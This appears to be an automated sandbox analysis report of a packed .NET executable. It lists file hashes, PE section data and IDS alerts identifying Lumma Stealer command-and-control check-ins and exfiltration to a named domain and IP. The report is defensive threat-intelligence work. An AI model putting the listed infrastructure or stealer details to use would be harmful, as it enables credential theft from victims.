Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "QuinnSamuelYvonne" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStr

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.641236463464292
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9cOUjp7ybm.exe
File size:	760'832 bytes
MD5:	7177b0ba961ddd258ee9672d436d6b63
SHA1:	cdb7aef7f7a05430d323c00d43fe98af4680fa28
SHA256:	1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95
SHA512:	df1b07f5d4ff53afc4547fb371af1393bafce2eec0cc96ab0ceeaeb4500a3e771f4d1b9c7936b86f38241abfdfb53c9cf2fff22d3a0e7006015f50c165c59078
SSDEEP:	12288:RoA2sfoKrzzpKnToLX5y8anwFgBGOXtoTmDr1aVupsZTDfCc71FT/mI69puLam6q:n2sg0z2ToE8+Q8tpDr10fCETZ6
TLSH:	5CF44A9C726072DFC867C472DEA82C68FA5174BB931F4247A02716ADAE4D897CF150F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug..............0...................... ....@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4c000a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67758BE0 [Wed Jan 1 18:39:28 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004C0000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x90750	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc0000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x90000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
<qqo!9W	0x2000	0x8dfbc	0x8e000	7fff0c7c0fecf003b0f35d7cfea5292b	False	1.0003197898327465	data	7.999708454943257	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x90000	0x2aab8	0x2ac00	96fdb7fa19e968f31ed3add38830b8bd	False	0.31700018274853803	data	4.601162956172314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x630	0x800	f56b61609acce3d2ff125ebe9500bda6	False	0.35693359375	data	3.5365525633689616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	5ba34c2ca37b35a0de4f3409909cbf7a	False	0.041015625	data	0.07225252269057866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xc0000	0x10	0x200	17f9b25275a4d7c97677dd9cc8f5a01d	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbc0a0	0x3a4	data			0.45278969957081544
RT_MANIFEST	0xbc444	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-04T09:41:59.845681+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.4	49481	1.1.1.1	53	UDP
2025-01-04T09:42:00.348017+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:00.348017+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:00.957953+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:00.957953+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	188.114.96.3	443	TCP
2025-01-04T09:42:01.447291+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:01.447291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:02.320886+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:02.320886+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-04T09:42:03.107818+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-04T09:42:03.107818+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	188.114.96.3	443	TCP
2025-01-04T09:42:06.751225+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-04T09:42:06.751225+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-04T09:42:07.275955+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49741	188.114.96.3	443	TCP
2025-01-04T09:42:07.911389+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-04T09:42:07.911389+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.96.3	443	TCP
2025-01-04T09:42:09.758036+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-04T09:42:09.758036+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	188.114.96.3	443	TCP
2025-01-04T09:42:11.141919+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-04T09:42:11.141919+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	188.114.96.3	443	TCP
2025-01-04T09:42:13.787834+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-04T09:42:13.787834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	188.114.96.3	443	TCP
2025-01-04T09:42:14.265404+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49745	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 09:41:59.868381977 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:41:59.868417978 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:41:59.868488073 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:41:59.871087074 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:41:59.871098995 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.347861052 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.348016977 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.377063990 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.377080917 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.377319098 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.428051949 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.532795906 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.532855034 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.532888889 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.957957029 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.958089113 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.958164930 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.960692883 CET	49736	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.960705042 CET	443	49736	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.970547915 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.970561981 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:00.970624924 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.971007109 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:00.971014977 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:01.447215080 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:01.447290897 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:01.460601091 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:01.460623026 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:01.461025953 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:01.471568108 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:01.471590042 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:01.471682072 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.320939064 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321028948 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321072102 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321074009 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.321099997 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321141005 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.321155071 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321257114 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321297884 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.321299076 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321314096 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321346045 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.321362019 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321546078 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.321588039 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.321594000 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.325539112 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.325587034 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.325592041 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.365581036 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.411401033 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.411483049 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.411526918 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.411622047 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.411628962 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.411643028 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.411664963 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.411696911 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.412379980 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.412396908 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.412406921 CET	49738	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.412411928 CET	443	49738	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.622525930 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.622567892 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:02.622633934 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.622889996 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:02.622914076 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:03.107732058 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:03.107817888 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:03.112905025 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:03.112914085 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:03.113240957 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:03.114420891 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:03.114572048 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:03.114619017 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:03.114677906 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:03.114685059 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.209470034 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.209559917 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.209631920 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.209758043 CET	49740	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.209774971 CET	443	49740	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.286535978 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.286567926 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.286669970 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.286971092 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.286982059 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.751007080 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.751224995 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.752393007 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.752399921 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.752598047 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:06.753858089 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.753981113 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:06.754008055 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.275970936 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.276087999 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.276194096 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.276407003 CET	49741	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.276422024 CET	443	49741	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.455223083 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.455266953 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.455349922 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.455655098 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.455670118 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.911304951 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.911389112 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.913014889 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.913021088 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.913237095 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.914371967 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.914546967 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.914582014 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:07.914640903 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:07.914649963 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:08.962595940 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:08.962718010 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:08.962773085 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:08.962893963 CET	49742	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:08.962908030 CET	443	49742	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.282937050 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.282975912 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.283129930 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.283418894 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.283442974 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.757945061 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.758035898 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.759154081 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.759162903 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.759758949 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:09.760881901 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.760926962 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:09.760931969 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:10.187879086 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:10.188009024 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:10.188080072 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:10.188206911 CET	49743	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:10.188230991 CET	443	49743	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:10.666409016 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:10.666454077 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:10.666557074 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:10.666927099 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:10.666943073 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.141833067 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.141918898 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.143353939 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.143363953 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.143665075 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.147414923 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148277044 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148313046 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.148420095 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148454905 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.148544073 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148598909 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.148693085 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148718119 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.148827076 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148852110 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.148969889 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.148996115 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158375978 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.158524036 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158550978 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.158570051 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158590078 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.158675909 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158704042 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.158724070 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158740997 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.158775091 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158797026 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.158844948 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.165184021 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:11.165261030 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:11.165287018 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.269215107 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.269402027 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.269470930 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.269727945 CET	49744	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.269747972 CET	443	49744	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.311661005 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.311700106 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.311780930 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.312060118 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.312073946 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.787765980 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.787833929 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.792129040 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.792138100 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.792377949 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:13.795975924 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.796019077 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:13.796045065 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265414000 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265471935 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265505075 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265523911 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265568018 CET	49745	443	192.168.2.4	188.114.96.3
